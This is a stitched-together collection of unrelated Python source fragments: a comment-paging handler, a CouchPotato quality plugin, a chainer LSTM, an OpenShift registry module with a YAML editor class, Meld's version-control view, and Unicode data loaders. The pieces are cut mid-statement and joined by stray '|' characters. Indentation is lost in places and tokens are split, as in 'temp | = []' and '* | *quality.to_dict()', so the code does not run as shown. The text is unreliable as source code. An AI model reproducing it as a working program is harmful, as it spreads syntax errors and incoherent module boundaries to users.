        connection = db.connection
        container_id = IN.commenter.get_container_id(entity)
        # TODO: paging
        # get total remaining comments older than last_id
        total = 0
        limit = 10
        cursor = db.select({
            'table' : 'entity.comment',
            'columns' : ['count(id)'],
            'where' : [
                ['container_id', container_id],
                ['id', '<', int(last_id)], # load previous
                ['parent_id', parent_id],
                ['status', 1],
            ],
        }).execute()
        if cursor.rowcount >= 0:
            total = int(cursor.fetchone()[0])
        more_id = '_'.join(('more-commens', entity_type, str(entity_id), str(parent_id)))
        if total > 0:
            cursor = db.select({
                'table' : 'entity.comment',
                'columns' : ['id'],
                'where' : [
                    ['container_id', container_id],
                    ['id', '<', int(last_id)],
                    ['parent_id', parent_id], # add main level comments only
                    ['status', 1],
                ],
                'order' : {'created' : 'DESC'},
                'limit' : limit,
            }).execute()
            ids = []
            last_id = 0
            if cursor.rowcount >= 0:
                for row in cursor:
                    ids.append(row['id'])
                last_id = ids[-1] # last id
            comments = IN.entitier.load_multiple('Comment', ids)
            for id, comment in comments.items():
                comment.weight = id # keep asc order
                output.add(comment)
            remaining = total - limit
            if remaining > 0 and last_id > 0:
                # Re-add the "N more comments" trigger for the next page.
                output.add('TextDiv', {
                    'id' : more_id,
                    'value' : str(remaining) + ' more comments',
                    'css' : ['ajax i-text-center i-text-danger pointer'],
                    'attributes' : {
                        'data-href' : ''.join(('/comment/more/!Content/', str(entity_id), '/', str(last_id), '/', str(parent_id)))
                    },
                    'weight' : -1,
                })
        #if not output:
            #output.add(type = 'TextDiv', data = {})
        output = {more_id : output}
        # Fix: the service locator is spelled ``IN`` everywhere else in this
        # handler; ``In.core.response`` raised a NameError that the except
        # below silently swallowed, so no response was ever set.
        context.response = IN.core.response.PartialResponse(output = output)
    except Exception:
        # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
        # still propagate; the framework logger records the traceback.
        IN.logger.debug()
|
et_session
from couchpotato.api import addApiView
from couchpotato.core.event import addEvent
from couchpotato.core.helpers.encoding import toUnicode
from couchpotato.core.helpers.request import jsonified, getParams
from couchpotato.core.helpers.variable import mergeDicts, md5, getExt
from couchpotato.core.logger import CPLog
from couchpotato.core.plugins.base import Plugin
from couchpotato.core.settings.model import Quality, Profile, ProfileType
from sqlalchemy.sql.expression import or_
import os.path
import re
import time
log = CPLog(__name__)
class QualityPlugin(Plugin):
qualities = [
{'identifier': 'bd50', 'hd': True, 'size': (15000, 60000), 'label': 'BR-Disk', 'alternative': ['bd25'], 'allow': ['1080p'], 'ext':[], 'tags': ['bdmv', 'certificate', ('complete', 'bluray')]},
{'identifier': '1080p', 'hd': True, 'size': (5000, 20000), 'label': '1080P', 'width': 1920, 'height': 1080, 'alternative': [], 'allow': [], 'ext':['mkv', 'm2ts'], 'tags': ['m2ts']},
{'identifier': '720p', 'hd': True, 'size': (3500, 10000), 'label': '720P', 'width': 1280, 'height': 720, 'alternative': [], 'allow': [], 'ext':['mkv', 'ts']},
{'identifier': 'brrip', 'hd': True, 'size': (700, 7000), 'label': 'BR-Rip', 'alternative': ['bdrip'], 'allow': ['720p'], 'ext':['avi']},
{'identifier': 'dvdr', 'size': (3000, 10000), 'label': 'DVD-R', 'alternative': [], 'allow': [], 'ext':['iso', 'img'], 'tags': ['pal', 'ntsc', 'video_ts', 'audio_ts']},
{'identifier': 'dvdrip', 'size': (600, 2400), 'label': 'DVD-Rip', 'width': 720, 'alternative': ['dvdrip'], 'allow': [], 'ext':['avi', 'mpg', 'mpeg'], 'tags': [('dvd', 'rip'), ('dvd', 'xvid'), ('dvd', 'divx')]},
{'identifier': 'scr', 'size': (600, 1600), 'label': 'Screener', 'alternative': ['screener', 'dvdscr', 'ppvrip'], 'allow': ['dvdr', 'dvd'], 'ext':['avi', 'mpg', 'mpeg']},
{'identifier': 'r5', 'size': (600, 1000), 'label': 'R5', 'alternative': [], 'allow': ['dvdr'], 'ext':['avi', 'mpg', 'mpeg']},
{'identifier': 'tc', 'size': (600, 1000), 'label': 'TeleCine', 'alternative': ['telecine'], 'allow': [], 'ext':['avi', 'mpg', 'mpeg']},
{'identifier': 'ts', 'size': (600, 1000), 'label': 'TeleSync', 'alternative': ['telesync', 'hdts'], 'allow': [], 'ext':['avi', 'mpg', 'mpeg']},
{'identifier': 'cam', 'size': (600, 1000), 'label': 'Cam', 'alternative': ['camrip', 'hdcam'], 'allow': [], 'ext':['avi', 'mpg', 'mpeg']}
]
pre_releases = ['cam', 'ts', 'tc', 'r5', 'scr']
    def __init__(self):
        """Register quality events and API views with the plugin framework."""
        # Events other plugins can fire to query quality data.
        addEvent('quality.all', self.all)
        addEvent('quality.single', self.single)
        addEvent('quality.guess', self.guess)
        addEvent('quality.pre_releases', self.preReleases)
        # HTTP API endpoints.
        addApiView('quality.size.save', self.saveSize)
        addApiView('quality.list', self.allView, docs = {
            'desc': 'List all available qualities',
            'return': {'type': 'object', 'example': """{
            'success': True,
            'list': array, qualities
        }"""}
        })
        # Seed the database with default qualities/profiles at startup.
        addEvent('app.initialize', self.fill, priority = 10)
    def preReleases(self):
        # Accessor used by the 'quality.pre_releases' event.
        return self.pre_releases
def allView(self):
return jsonified({
'success': True,
'list': self.all()
})
def all(self):
db = get_session()
qualities = db.query(Quality).all()
temp | = []
for quality in qualities:
q = mergeDicts(self.getQuality(quality.identifier), quality.to_dict())
temp.append(q)
return temp
def single(self, identifier = ''):
db = get_session()
quality_dict = {}
quality = db.query(Quality).filter(or_(Quality.identifier == identifier, Quality.id == identifier)).first()
if quality:
quality_dict = dict(self.getQuality(quality.identifier), * | *quality.to_dict())
return quality_dict
def getQuality(self, identifier):
for q in self.qualities:
if identifier == q.get('identifier'):
return q
    def saveSize(self):
        """API handler: store a size bound (min/max) for one quality.

        NOTE(review): setattr uses the request-supplied 'value_type' as the
        attribute name without validation -- confirm upstream restricts it
        to 'size_min'/'size_max'.
        """
        params = getParams()
        db = get_session()
        quality = db.query(Quality).filter_by(identifier = params.get('identifier')).first()
        if quality:
            setattr(quality, params.get('value_type'), params.get('value'))
            db.commit()
        return jsonified({
            'success': True
        })
    def fill(self):
        """Seed the Quality and Profile tables from the static definitions.

        Runs at app initialize; only creates rows that do not exist yet, so
        user edits to existing rows survive restarts.
        """
        db = get_session();
        order = 0
        for q in self.qualities:
            # Create quality
            qual = db.query(Quality).filter_by(identifier = q.get('identifier')).first()
            if not qual:
                log.info('Creating quality: %s', q.get('label'))
                qual = Quality()
                qual.order = order
                qual.identifier = q.get('identifier')
                qual.label = toUnicode(q.get('label'))
                qual.size_min, qual.size_max = q.get('size')
                db.add(qual)
            # Create single quality profile
            prof = db.query(Profile).filter(
                Profile.core == True
            ).filter(
                Profile.types.any(quality = qual)
            ).all()
            if not prof:
                log.info('Creating profile: %s', q.get('label'))
                prof = Profile(
                    core = True,
                    label = toUnicode(qual.label),
                    order = order
                )
                db.add(prof)
                profile_type = ProfileType(
                    quality = qual,
                    profile = prof,
                    finish = True,
                    order = 0
                )
                prof.types.append(profile_type)
            order += 1
        db.commit()
        time.sleep(0.3) # Wait a moment
        return True
def guess(self, files, extra = {}):
# Create hash for cache
hash = md5(str([f.replace('.' + getExt(f), '') for f in files]))
cached = self.getCache(hash)
if cached and extra is {}: return cached
for cur_file in files:
size = (os.path.getsize(cur_file) / 1024 / 1024) if os.path.isfile(cur_file) else 0
words = re.split('\W+', cur_file.lower())
for quality in self.all():
# Check tags
if quality['identifier'] in words:
log.debug('Found via identifier "%s" in %s', (quality['identifier'], cur_file))
return self.setCache(hash, quality)
if list(set(quality.get('alternative', [])) & set(words)):
log.debug('Found %s via alt %s in %s', (quality['identifier'], quality.get('alternative'), cur_file))
return self.setCache(hash, quality)
for tag in quality.get('tags', []):
if isinstance(tag, tuple) and '.'.join(tag) in '.'.join(words):
log.debug('Found %s via tag %s in %s', (quality['identifier'], quality.get('tags'), cur_file))
return self.setCache(hash, quality)
if list(set(quality.get('tags', [])) & set(words)):
log.debug('Found %s via tag %s in %s', (quality['identifier'], quality.get('tags'), cur_file))
return self.setCache(hash, quality)
# Try again with loose testing
quality = self.guessLoose(hash, extra = extra)
if quality:
return self.setCache(hash, quality)
log.debug('Could not identify quality for: %s', files)
return None
def guessLoose(self, hash, extra):
for quality in self.all():
# Check width resolution, range 20
if (quality.get('width', 720) - 20) <= extra.get('resolution_width', 0) <= (quality.get('width', 720) + 20):
log.debug('Found %s via resolution_width: %s == %s', (quality['identifier'], quality.get('width', 720), extra.get('resolution_width', 0)))
return self.setCache(hash, quality)
# Check height resolution, range 20
if (quality.get('height', 480) - 20) |
#coding:utf-8
import numpy as np
from chainer import Variable, FunctionSet
import chainer.functions as F
class LSTM(FunctionSet):
    """Single-layer LSTM regressor built on the old chainer FunctionSet API.

    l1_x/l1_h produce the 4*n_units pre-activations consumed by F.lstm;
    l6 projects the hidden state back to the input dimension f_n_units.
    """
    def __init__(self,f_n_units, n_units):
        super(LSTM, self).__init__(
            l1_x = F.Linear(f_n_units, 4*n_units),
            l1_h = F.Linear(n_units, 4*n_units),
            l6 = F.Linear(n_units, f_n_units)
        )
        # Initialize every parameter uniformly in [-0.08, 0.08].
        for param in self.parameters:
            param[:] = np.random.uniform(-0.08, 0.08, param.shape)
    def forward_one_step(self, x_data, y_data, state, train=True,dropout_ratio=0.0):
        """Run one LSTM step with dropout; return (new_state, MSE loss)."""
        x ,t = Variable(x_data,volatile=not train),Variable(y_data,volatile=not train)
        h1_in = self.l1_x(F.dropout(x, ratio=dropout_ratio, train=train)) + self.l1_h(state['h1'])
        c1, h1 = F.lstm(state['c1'], h1_in)
        y = self.l6(F.dropout(h1, ratio=dropout_ratio, train=train))
        state = {'c1': c1, 'h1': h1}
        return state, F.mean_squared_error(y, t)
    def predict(self, x_data, y_data, state):
        """Run one deterministic step (no dropout); return (new_state, MSE loss)."""
        x ,t = Variable(x_data,volatile=False),Variable(y_data,volatile=False)
        h1_in = self.l1_x(x) + self.l1_h(state['h1'])
        c1, h1 = F.lstm(state['c1'], h1_in)
        y = self.l6(h1)
        state = {'c1': c1, 'h1': h1}
        return state,F.mean_squared_error(y,t)
def make_initial_state(n_units, train=True):
    """Return a zero-filled LSTM state dict with cell 'c1' and hidden 'h1'.

    Each entry is a (1, n_units) float32 chainer Variable; volatile when
    not training. Extend the name tuple to add layers (c2/h2, ...).
    """
    state = {}
    for name in ('c1', 'h1'):
        state[name] = Variable(np.zeros((1, n_units), dtype=np.float32),
                               volatile=not train)
    return state
|
e:
description:
- The selector when filtering on node labels
required: false
default: None
aliases: []
images:
description:
    - The image to base this registry on - ${component} will be replaced with --type
    required: false
    default: 'openshift3/ose-${component}:${version}'
    aliases: []
latest_images:
description:
- If true, attempt to use the latest image for the registry instead of the latest release.
required: false
default: False
aliases: []
labels:
description:
- A set of labels to uniquely identify the registry and its components.
required: false
default: None
aliases: []
enforce_quota:
description:
- If set, the registry will refuse to write blobs if they exceed quota limits
required: False
default: False
aliases: []
mount_host:
description:
- If set, the registry volume will be created as a host-mount at this path.
required: False
default: False
aliases: []
ports:
description:
- A comma delimited list of ports or port pairs to expose on the registry | pod. The default is set for 5000.
required: False
default: [5000]
aliases: []
replicas:
description:
| - The replication factor of the registry; commonly 2 when high availability is desired.
required: False
default: 1
aliases: []
selector:
description:
- Selector used to filter nodes on deployment. Used to run registries on a specific set of nodes.
required: False
default: None
aliases: []
service_account:
description:
- Name of the service account to use to run the registry pod.
required: False
default: 'registry'
aliases: []
tls_certificate:
description:
- An optional path to a PEM encoded certificate (which may contain the private key) for serving over TLS
required: false
default: None
aliases: []
tls_key:
description:
- An optional path to a PEM encoded private key for serving over TLS
required: false
default: None
aliases: []
volume_mounts:
description:
- The volume mounts for the registry.
required: false
default: None
aliases: []
daemonset:
description:
- Use a daemonset instead of a deployment config.
required: false
default: False
aliases: []
edits:
description:
- A list of modifications to make on the deploymentconfig
required: false
default: None
aliases: []
env_vars:
description:
    - A dictionary of environment variables to set on the deploymentconfig. e.g. FOO: BAR
required: false
default: None
aliases: []
force:
description:
- Force a registry update.
required: false
default: False
aliases: []
author:
- "Kenny Woodson <kwoodson@redhat.com>"
extends_documentation_fragment: []
'''
EXAMPLES = '''
- name: create a secure registry
oc_adm_registry:
name: docker-registry
service_account: registry
replicas: 2
namespace: default
selector: type=infra
images: "registry.ops.openshift.com/openshift3/ose-${component}:${version}"
env_vars:
REGISTRY_CONFIGURATION_PATH: /etc/registryconfig/config.yml
REGISTRY_HTTP_TLS_CERTIFICATE: /etc/secrets/registry.crt
REGISTRY_HTTP_TLS_KEY: /etc/secrets/registry.key
REGISTRY_HTTP_SECRET: supersecret
volume_mounts:
- path: /etc/secrets
name: dockercerts
type: secret
secret_name: registry-secret
- path: /etc/registryconfig
name: dockersecrets
type: secret
secret_name: docker-registry-config
edits:
- key: spec.template.spec.containers[0].livenessProbe.httpGet.scheme
value: HTTPS
action: put
- key: spec.template.spec.containers[0].readinessProbe.httpGet.scheme
value: HTTPS
action: put
- key: spec.strategy.rollingParams
value:
intervalSeconds: 1
maxSurge: 50%
maxUnavailable: 50%
timeoutSeconds: 600
updatePeriodSeconds: 1
action: put
- key: spec.template.spec.containers[0].resources.limits.memory
value: 2G
action: update
- key: spec.template.spec.containers[0].resources.requests.memory
value: 1G
action: update
register: registryout
'''
# -*- -*- -*- End included fragment: doc/registry -*- -*- -*-
# -*- -*- -*- Begin included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
class YeditException(Exception):  # pragma: no cover
    """Raised for Yedit-specific failures."""
# pylint: disable=too-many-public-methods
class Yedit(object): # pragma: no cover
''' Class to modify yaml files '''
re_valid_key = r"(((\[-?\d+\])|([0-9a-zA-Z%s/_-]+)).?)+$"
re_key = r"(?:\[(-?\d+)\])|([0-9a-zA-Z{}/_-]+)"
com_sep = set(['.', '#', '|', ':'])
# pylint: disable=too-many-arguments
    def __init__(self,
                 filename=None,
                 content=None,
                 content_type='yaml',
                 separator='.',
                 backup=False):
        """Wrap *filename* and/or *content* for keyed yaml/json editing.

        load() may replace the initial content with what is parsed from
        filename.
        """
        self.content = content
        self._separator = separator
        self.filename = filename
        self.__yaml_dict = content
        self.content_type = content_type
        self.backup = backup
        self.load(content_type=self.content_type)
        # Guarantee a dict so key operations never hit None.
        if self.__yaml_dict is None:
            self.__yaml_dict = {}
    @property
    def separator(self):
        ''' key separator used when parsing dotted key paths '''
        return self._separator
    @separator.setter
    def separator(self, inc_sep):
        ''' replace the key separator used for path parsing '''
        self._separator = inc_sep
    @property
    def yaml_dict(self):
        ''' the parsed content (a dict after __init__ unless reassigned) '''
        return self.__yaml_dict
    @yaml_dict.setter
    def yaml_dict(self, value):
        ''' replace the parsed content wholesale '''
        self.__yaml_dict = value
@staticmethod
def parse_key(key, sep='.'):
'''parse the key allowing the appropriate separator'''
common_separators = list(Yedit.com_sep - set([sep]))
return re.findall(Yedit.re_key.format(''.join(common_separators)), key)
@staticmethod
def valid_key(key, sep='.'):
'''validate the incoming key'''
common_separators = list(Yedit.com_sep - set([sep]))
if not re.match(Yedit.re_valid_key.format(''.join(common_separators)), key):
return False
return True
    @staticmethod
    def remove_entry(data, key, sep='.'):
        ''' remove data at location key

        Returns True on success, None when the key is invalid or the path
        does not resolve. An empty key clears the whole container.
        '''
        if key == '' and isinstance(data, dict):
            data.clear()
            return True
        elif key == '' and isinstance(data, list):
            del data[:]
            return True
        # refuse structurally invalid keys on container data
        if not (key and Yedit.valid_key(key, sep)) and \
                isinstance(data, (list, dict)):
            return None
        key_indexes = Yedit.parse_key(key, sep)
        # walk to the parent container of the final key component
        for arr_ind, dict_key in key_indexes[:-1]:
            if dict_key and isinstance(data, dict):
                data = data.get(dict_key)
            elif (arr_ind and isinstance(data, list) and
                    int(arr_ind) <= len(data) - 1):
                data = data[int(arr_ind)]
            else:
                return None
        # process last index for remove
        # expected list entry
        if key_indexes[-1][0]:
            if isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1: # noqa: E501
                del data[int(key_indexes[-1][0])]
                return True
        # expected dict entry
        elif key_indexes[-1][1]:
            if isinstance(data, dict):
                del data[key_indexes[-1][1]]
                return True
@staticmethod
def add_entry(data, key, item=None, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
d = {'a': {'b': 'c'}}}
key = a#b
return c
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_ |
s'.
"""
self.scheduler.add_task(self._command_iter(command, files, refresh))
def _command_on_selected(self, command, refresh=1):
files = self._get_selected_files()
if len(files):
self._command(command, files, refresh)
    def on_button_update_clicked(self, obj):
        """Toolbar callback: update the selected files from version control."""
        self._command_on_selected(self.vc.update_command())
    def on_button_commit_clicked(self, obj):
        """Toolbar callback: open the commit dialog for this view."""
        CommitDialog(self).run()
    def on_button_add_clicked(self, obj):
        """Toolbar callback: add the selected files to version control."""
        self._command_on_selected(self.vc.add_command())
    def on_button_remove_clicked(self, obj):
        """Toolbar callback: remove the selected files from version control."""
        self._command_on_selected(self.vc.remove_command())
    def on_button_resolved_clicked(self, obj):
        """Toolbar callback: mark the selected files' conflicts as resolved."""
        self._command_on_selected(self.vc.resolved_command())
    def on_button_revert_clicked(self, obj):
        """Toolbar callback: revert the selected files to their VC state."""
        self._command_on_selected(self.vc.revert_command())
    def on_button_delete_clicked(self, obj):
        """Delete the selected files/directories from disk, then re-scan.

        Directories are only removed recursively after user confirmation.
        """
        files = self._get_selected_files()
        for name in files:
            try:
                if os.path.isfile(name):
                    os.remove(name)
                elif os.path.isdir(name):
                    if misc.run_dialog(_("'%s' is a directory.\nRemove recursively?") % os.path.basename(name),
                                       parent = self,
                                       buttonstype=gtk.BUTTONS_OK_CANCEL) == gtk.RESPONSE_OK:
                        shutil.rmtree(name)
            except OSError as e:
                misc.run_dialog(_("Error removing %s\n\n%s.") % (name,e), parent = self)
        # refresh the smallest subtree containing everything we touched
        workdir = _commonprefix(files)
        self.refresh_partial(workdir)
def on_button_diff_clicked(self, obj):
files = self._get_selected_files()
if len(files):
self.run_diff(files)
    def open_external(self):
        """Open the currently selected files with the external helper."""
        self._open_files(self._get_selected_files())
    def show_patch(self, prefix, patch, silent=False):
        """Apply *patch* (paths relative to *prefix*) into a temp dir and
        emit a create-diff pair (patched copy, original path) per file.

        Returns True when the patch applied cleanly, False otherwise.
        """
        # Bail out early when the external 'patch' tool is unavailable.
        if vc._vc.call(["which", "patch"]):
            primary = _("Patch tool not found")
            secondary = _("Meld needs the <i>patch</i> tool to be installed "
                          "to perform comparisons in %s repositories. Please "
                          "install <i>patch</i> and try again.") % self.vc.NAME
            msgarea = self.msgarea_mgr.new_from_text_and_icon(
                gtk.STOCK_DIALOG_ERROR, primary, secondary)
            msgarea.add_button(_("Hi_de"), gtk.RESPONSE_CLOSE)
            msgarea.connect("response", lambda *args: self.msgarea_mgr.clear())
            msgarea.show_all()
            return False
        # cleaned up at exit via the module-level _temp_dirs list
        tmpdir = tempfile.mkdtemp("-meld")
        _temp_dirs.append(tmpdir)
        diffs = []
        for fname in self.vc.get_patch_files(patch):
            destfile = os.path.join(tmpdir,fname)
            destdir = os.path.dirname( destfile )
            if not os.path.exists(destdir):
                os.makedirs(destdir)
            pathtofile = os.path.join(prefix, fname)
            try:
                shutil.copyfile( pathtofile, destfile)
            except IOError: # it is missing, create empty file
                open(destfile,"w").close()
            diffs.append( (destfile, pathtofile) )
        patchcmd = self.vc.patch_command(tmpdir)
        try:
            result = misc.write_pipe(patchcmd, patch, error=misc.NULL)
        except OSError:
            result = 1
        if result == 0:
            # patched copies become read-only so edits go to the original
            for d in diffs:
                os.chmod(d[0], 0o444)
                self.emit("create-diff", d)
            return True
        elif not silent:
            primary = _("Error fetching original comparison file")
            secondary = _("Meld couldn't obtain the original version of your "
                          "comparison file. If you are using the most recent "
                          "version of Meld, please report a bug, including as "
                          "many details as possible.")
            msgarea = self.msgarea_mgr.new_from_text_and_icon(
                gtk.STOCK_DIALOG_ERROR, primary, secondary)
            msgarea.add_button(_("Hi_de"), gtk.RESPONSE_CLOSE)
            msgarea.add_button(_("Report a bug"), gtk.RESPONSE_OK)
            def patch_error_cb(msgarea, response):
                if response == gtk.RESPONSE_OK:
                    bug_url = "https://bugzilla.gnome.org/enter_bug.cgi?" + \
                              "product=meld"
                    misc.open_uri(bug_url)
                else:
                    self.msgarea_mgr.clear()
            msgarea.connect("response", patch_error_cb)
            msgarea.show_all()
        return False
    def refresh(self):
        """Re-scan the whole tree from its root path."""
        self.set_location( self.model.value_path( self.model.get_iter_root(), 0 ) )
    def refresh_partial(self, where):
        """Re-scan only the subtree rooted at *where*.

        In flattened mode there is no subtree to replace, so this falls back
        to a full refresh.
        """
        if not self.actiongroup.get_action("VcFlatten").get_active():
            it = self.find_iter_by_name( where )
            if it:
                # replace the node with a fresh one and re-scan it lazily
                newiter = self.model.insert_after( None, it)
                self.model.set_value(newiter, self.model.column_index( tree.COL_PATH, 0), where)
                self.model.set_path_state(newiter, 0, tree.STATE_NORMAL, True)
                self.model.remove(it)
                self.scheduler.add_task(self._search_recursively_iter(newiter))
        else: # XXX fixme
            self.refresh()
def _update_item_state(self, it, vcentry, location):
e = vcentry
self.model.set_path_state(it, 0, e.state, e.isdir)
def setcol(col, val):
self.model.set_value(it, self.model.column_index(col, 0), val)
setcol(COL_LOCATION, location)
setcol(COL_STATUS, e.get_status())
setcol(COL_REVISION, e.rev)
setcol(COL_TAG, e.tag)
setcol(COL_OPTIONS, e.options)
    def on_file_changed(self, filename):
        """Refresh the tree row for *filename* after an on-disk change."""
        it = self.find_iter_by_name(filename)
        if it:
            path = self.model.value_path(it, 0)
            self.vc.update_file_state(path)
            files = self.vc.lookup_files([], [(os.path.basename(path), path)])[1]
            for e in files:
                if e.path == path:
                    # the location column is the path relative to the tree root
                    prefixlen = 1 + len( self.model.value_path( self.model.get_iter_root(), 0 ) )
                    self._update_item_state( it, e, e.parent[prefixlen:])
                    return
    def find_iter_by_name(self, name):
        """Walk the tree towards *name*; return its iter, or None.

        Only descends into children whose path is a prefix of *name*.
        """
        it = self.model.get_iter_root()
        path = self.model.value_path(it, 0)
        while it:
            if name == path:
                return it
            elif name.startswith(path):
                # descend into the matching child, if any
                child = self.model.iter_children( it )
                while child:
                    path = self.model.value_path(child, 0)
                    if name == path:
                        return child
                    elif name.startswith(path):
                        break
                    else:
                        child = self.model.iter_next( child )
                it = child
            else:
                break
        return None
def on_console_view_toggle(self, box, event=None):
if box == self.console_hide_box:
self.prefs.vc_console_visible = 0
self.console_hbox.hide()
self.console_show_box.show()
else:
self.prefs.vc_console_visible = 1
self.console_hbox.show()
self.console_show_box.hide()
    def on_consoleview_populate_popup(self, text, menu):
        """Prepend a 'clear console' item plus a separator to the popup."""
        item = gtk.ImageMenuItem(gtk.STOCK_CLEAR)
        def activate(*args):
            # wipe the whole console buffer
            buf = text.get_buffer()
            buf.delete( buf.get_start_iter(), buf.get_end_iter() )
        item.connect("activate", activate)
        item.show()
        menu.insert( item, 0 )
        item = gtk.SeparatorMenuItem()
        item.show()
        menu.insert( item, 1 )
def on_treeview_cursor_changed(self, *args):
cursor_path, cursor_col = self.treeview.get_cursor()
if not cursor_path:
self.emit("next-diff-changed", False, False)
self.current_path = cursor_path
return
# If invoked directly rather than through a callback, we always check
if not args:
skip = False
else:
try:
old |
composition = "".join(decomposition)
bidi_mirroring = line[9] == "Y"
if general_category == "Ll":
upcode = line[12]
if upcode:
upper_case = int(upcode, 16)
_lower_to_upper_case[code] = upper_case
if char_name.endswith("First>"):
last_range_opener = code
elif char_name.endswith("Last>"):
# Ignore surrogates
if "Surrogate" not in char_name:
for char in range(last_range_opener, code + 1):
_general_category_data[char] = general_category
_combining_class_data[char] = combining_class
if bidi_mirroring:
_bidi_mirroring_characters.add(char)
_defined_characters.add(char)
else:
_character_names_data[code] = char_name
_general_category_data[code] = general_category
_combining_class_data[code] = combining_class
if bidi_mirroring:
_bidi_mirroring_characters.add(code)
_decomposition_data[code] = decomposition
_defined_characters.add(code)
_defined_characters = frozenset(_defined_characters)
_bidi_mirroring_characters = frozenset(_bidi_mirroring_characters)
def _load_scripts_txt():
    """Populate _script_data with the script property from Scripts.txt."""
    with open_unicode_data_file("Scripts.txt") as scripts_file:
        for start, end, script_name in _parse_code_ranges(scripts_file.read()):
            code = _folded_script_name_to_code[_folded_script_name(script_name)]
            for cp in range(start, end + 1):
                _script_data[cp] = code
def _load_script_extensions_txt():
    """Populate _script_extensions_data from ScriptExtensions.txt."""
    with open_unicode_data_file("ScriptExtensions.txt") as se_file:
        for start, end, names in _parse_code_ranges(se_file.read()):
            scripts = frozenset(names.split(" "))
            for cp in range(start, end + 1):
                _script_extensions_data[cp] = scripts
def _load_blocks_txt():
    """Populate block tables (_block_names, _block_range, _block_data)."""
    with open_unicode_data_file("Blocks.txt") as blocks_file:
        for start, end, block_name in _parse_code_ranges(blocks_file.read()):
            _block_names.append(block_name)
            _block_range[block_name] = (start, end)
            for cp in range(start, end + 1):
                _block_data[cp] = block_name
def _load_derived_age_txt():
    """Populate _age_data with the Age property from DerivedAge.txt."""
    with open_unicode_data_file("DerivedAge.txt") as age_file:
        for start, end, age in _parse_code_ranges(age_file.read()):
            for cp in range(start, end + 1):
                _age_data[cp] = age
def _load_derived_core_properties_txt():
    """Load derived core properties from DerivedCoreProperties.txt.

    Fills _core_properties_data, mapping each property name to the set of
    code points that carry it.
    """
    with open_unicode_data_file("DerivedCoreProperties.txt") as dcp_txt:
        dcp_ranges = _parse_code_ranges(dcp_txt.read())
        for first, last, property_name in dcp_ranges:
            # setdefault replaces the original try/except KeyError dance
            prop_chars = _core_properties_data.setdefault(property_name, set())
            prop_chars.update(range(first, last + 1))
def _load_property_value_aliases_txt():
    """Build script code <-> long name tables from PropertyValueAliases.txt."""
    with open_unicode_data_file("PropertyValueAliases.txt") as pva_file:
        for item in _parse_semicolon_separated_data(pva_file.read()):
            if item[0] != "sc":  # only Script aliases are of interest
                continue
            code, long_name = item[1], item[2]
            _script_code_to_long_name[code] = long_name.replace("_", " ")
            _folded_script_name_to_code[_folded_script_name(long_name)] = code
def _load_bidi_mirroring_txt():
    """Populate _bidi_mirroring_glyph_data from BidiMirroring.txt."""
    with open_unicode_data_file("BidiMirroring.txt") as bm_file:
        for char_hex, glyph_hex in _parse_semicolon_separated_data(bm_file.read()):
            _bidi_mirroring_glyph_data[int(char_hex, 16)] = int(glyph_hex, 16)
def _load_indic_data():
    """Populate Indic positional/syllabic tables from the Indic*.txt files."""
    with open_unicode_data_file("IndicPositionalCategory.txt") as inpc_file:
        for start, end, position in _parse_code_ranges(inpc_file.read()):
            for cp in range(start, end + 1):
                _indic_positional_data[cp] = position
    with open_unicode_data_file("IndicSyllabicCategory.txt") as insc_file:
        for start, end, category in _parse_code_ranges(insc_file.read()):
            for cp in range(start, end + 1):
                _indic_syllabic_data[cp] = category
def _load_emoji_data():
    """Parse the new draft format of emoji-data.txt

    Populates the module-level emoji property frozensets on first call;
    subsequent calls are no-ops.
    """
    global _presentation_default_emoji, _presentation_default_text
    global _emoji, _emoji_modifier_base
    # already loaded -- nothing to do
    if _presentation_default_emoji:
        return
    emoji_sets = {
        "Emoji": set(),
        "Emoji_Presentation": set(),
        "Emoji_Modifier": set(),
        "Emoji_Modifier_Base": set(),
        "Extended_Pictographic": set(),
        "Emoji_Component": set(),
    }
    set_names = "|".join(sorted(emoji_sets.keys()))
    # data lines look like: "XXXX[..YYYY] ; Property # comment"
    line_re = re.compile(
        r"([0-9A-F]{4,6})(?:\.\.([0-9A-F]{4,6}))?\s*;\s*" r"(%s)\s*#.*$" % set_names
    )
    with open_unicode_data_file("emoji-data.txt") as f:
        for line in f:
            line = line.strip()
            if not line or line[0] == "#":
                continue
            m = line_re.match(line)
            if not m:
                raise ValueError('Did not match "%s"' % line)
            start = int(m.group(1), 16)
            end = start if not m.group(2) else int(m.group(2), 16)
            emoji_set = emoji_sets.get(m.group(3))
            emoji_set.update(range(start, end + 1))
    # allow our legacy use of handshake and wrestlers with skin tone modifiers
    emoji_sets["Emoji_Modifier_Base"] |= {0x1F91D, 0x1F93C}
    _presentation_default_emoji = frozenset(emoji_sets["Emoji_Presentation"])
    _presentation_default_text = frozenset(
        emoji_sets["Emoji"] - emoji_sets["Emoji_Presentation"]
    )
    _emoji_modifier_base = frozenset(emoji_sets["Emoji_Modifier_Base"])
    _emoji = frozenset(emoji_sets["Emoji"])
# Sentinel age for emoji that are proposed but not yet in a Unicode release.
PROPOSED_EMOJI_AGE = 1000.0
# Zero-width joiner, used to splice emoji into ZWJ sequences.
ZWJ = 0x200D
# Variation selector-16: forces emoji (colorful) presentation.
EMOJI_VS = 0xFE0F
# Sequence-type names accepted when parsing the emoji sequence data files.
EMOJI_SEQUENCE_TYPES = frozenset(
    [
        "Basic_Emoji",
        "Emoji_Keycap_Sequence",
        "Emoji_Combining_Sequence",
        "Emoji_Flag_Sequence",
        "RGI_Emoji_Flag_Sequence",
        "RGI_Emoji_Tag_Sequence",
        "Emoji_Modifier_Sequence",
        "RGI_Emoji_Modifier_Sequence",
        "RGI_Emoji_ZWJ_Sequence",
        "Emoji_ZWJ_Sequence",
        "Emoji_Single_Sequence",
    ]
)
# Unicode 12 decided to be 'helpful' and included single emoji in the sequence
# data, but unlike all the other data represents these in batches as XXXX..XXXX
# rather than one per line. We can't get name data for these so we can't
# use that data, but still have to parse the line.
def _read_emoji_data(lines):
"""Parse lines of emoji data and return a map from sequence to tuples of
name, age, type."""
line_re = re.compile(
r"(?:([0-9A-F ]+)|([0-9A-F]+\.\.[0-9A-F]+)\s*);\ |
[-1., 1., 0.],
[1., 1., 0.],
